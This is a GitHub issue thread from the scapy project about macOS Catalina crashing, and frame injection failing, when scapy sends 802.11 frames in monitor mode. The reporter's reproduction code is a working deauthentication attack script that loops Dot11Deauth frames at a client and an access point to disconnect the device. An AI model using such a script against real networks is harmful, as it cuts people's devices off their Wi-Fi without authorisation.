Mac os Catalina monitor mode

mickael-btc commented 5 years ago

Brief description

I am trying to deauth a device with scapy on macOS Catalina but instead of sending packets my mac just power off. It seems to be a problem with the "en0" wifi interface which probably has problems to work with scapy on monitor mode. My mac crash only when i put the "monitor=True" param. When i run my code without that param the code run fine but it don't deauth the device. I tested the same script on kali linux with python 2.7.16 and scapy 2.40 and it worked well : the device was disconnect.

Environment

Scapy version: scapy 2.4.3rc3.dev18
Python version: 2.7.16
Operating System: MacOS Catalina beta 4

How to reproduce

from scapy.all import * conf.use_pcap = True

#real MAC adresses are hiden ap = "FF:FF:FF:FF:FF:FF" c = "FF:FF:FF:FF:FF:FF"

pkt=RadioTap()/Dot11(addr1=c, addr2=ap, addr3=ap)/Dot11Deauth(reason=2) pkt1=RadioTap()/Dot11(addr1=ap, addr2=c, addr3=c)/Dot11Deauth(reason=2)

while True: sendp(pkt, iface="en0", monitor=True) sendp(pkt1, iface="en0", monitor=True)

Actual result

My macbook just power off when I try to send packet.

Expected result

deauth a device by sending deauth frame to him and to the router.

gpotter2 commented 5 years ago

This is very probably a Catalina bug (still the beta). The fact that it shuts down is a sign of a pretty severe failure :/ this should probably get reported, though they probably know about it already.

It is also possible that they have changed the way we should set an interface into monitor mode (we were using a sort of hack), therefore Scapy would need an update.

Even if Scapy requires changes, we can't do much before the official release..

mickael-btc commented 5 years ago

Thank for your answer. I'll wait the release to see changes. hope it will be fixed.

guedou commented 5 years ago

Do you have a similar effect with tcpdump --monitor-mode or /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport?

mickael-btc commented 5 years ago

what works

when I run these two commands my wifi logo changes to monitor mode

airport en0 sniff
sudo tcpdump -Ii en0

Code and command below changes wifi to promisc mode only :

from scapy.all import *
conf.use_pcap
p = sniff()
p.summary()

sudo tcpdump -i en0

what doesn't work

sudo tcpdump -I en0
sudo tcpdump --monitor-mode when I run these lines I got an error: tcpdump: pktap: That device doesn't support monitor mode

Yesterday i reinstalled scapy, pypcap, libdnet and some other package and i noticed that my mac doesn' shut down anymore (exept when i write conf.use_pcap = False instead of conf.use_pcap = True.
Now the script run "fine" in python 2.7.16 an 3.7 without crashing. But it still doesn't deauth devices and still doesn't put MacOS in monitor mode even if I can sniff with scapy on promisc mode.

when i interrupt the script with ^C i got a message in two versions of python :

File "/Users/rubikon/Desktop/script.py", line 11, in <module>
    sendp(pkt, iface="en0", monitor=True)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/sendrecv.py", line 326, in sendp
    socket = conf.L2socket(iface=iface, *args, **kargs)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 494, in __init__
    self.outs = open_pcap(iface, MTU, self.promisc, 100)
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 435, in <lambda>
    open_pcap = lambda *args, **kargs: _PcapWrapper_pcapy(*args, **kargs)  # noqa: E501
  File "/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/scapy/arch/pcapdnet.py", line 398, in __init__
    self.pcap = pcap.open_live(device, snaplen, promisc, to_ms)   # noqa: E501
KeyboardInterrupt

File "/Users/rubikon/Desktop/script.py", line 11, in <module>
    sendp(pkt, iface="en0", monitor=True)
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/sendrecv.py", line 326, in sendp
    socket = conf.L2socket(iface=iface, *args, **kargs)
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 494, in __init__
    self.outs = open_pcap(iface, MTU, self.promisc, 100)
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 341, in <lambda>
    open_pcap = lambda *args, **kargs: _PcapWrapper_pypcap(*args, **kargs)  # noqa: E501
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/pcapdnet.py", line 308, in __init__
    self.pcap = pcap.pcap(device, snaplen, promisc, immediate=1, timeout_ms=to_ms, rfmon=monitor)  # noqa: E501
KeyboardInterrupt

Its probably useless but on sais jamais...

guedou commented 5 years ago

I am surprised that the other methods does not crash macOS too. What does this command do?

$ cat test_sniff.py 
from scapy.all import *

s = sniff(count=1, timeout=1, monitor=True)
if len(s):
    s.nsummary()

mickael-btc commented 5 years ago

I get that error in two version of python:

Traceback (most recent call last):
  File "test.py", line 3, in <module>
    s = sniff(count=1, timeout=1, monitor=True)
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/sendrecv.py", line 836, in sniff
    *arg, **karg)] = iface
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/bpf/supersocket.py", line 58, in __init__
    (self.ins, self.dev_bpf) = get_dev_bpf()
  File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/scapy/arch/bpf/core.py", line 98, in get_dev_bpf
    raise Scapy_Exception("No /dev/bpf handle is available !")
scapy.error.Scapy_Exception: No /dev/bpf handle is available !

currently i'm using scapy 2.4.2 with changes made by you in /arch/unix.py. I think it's a catalina problem : i found software on mac os that can deauth but they won't work too. Do you have a link of working scapy version ?

guedou commented 5 years ago

You need to start the script as root.

mickael-btc commented 5 years ago

oh sorry. when i ran in sudo mode i got:

2019-07-25 10:45:43.438 Python[17537:604634] NSSoftLinking - The function 'SLSIsSuppressedByScreenTime' can't be found in the (null) framework. in python 2.7
0000 RadioTap / Dot11FCS / Dot11Beacon / SSID='orange' / Dot11EltRates / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11Elt / Dot11EltVendorSpecific / Dot11EltVendorSpecific in python 3.7

guedou commented 5 years ago

I don't know what this error means, however the RadioTap header means that the monitoring mode works fine as you are able to sniff raw 802.11 frames.

mickael-btc commented 5 years ago

I redid tests and yes the monitor mode is activated 😅 Thanks a lot. The issue was that i didn't run sudo airport -z the first time. But I have a question : why i can't deauth a device ? Is there a bug or is my code wrong ?

guedou commented 5 years ago

I am not sure that 802.11 injection with Scapy was ever tested on macOS =\

guedou commented 5 years ago

I can't inject on macOS 10.14 either, and did not find a tool that can. I believe that this is not related to Scapy.

Please reopen the issue if you find a tool that can inject frames.

secdev / scapy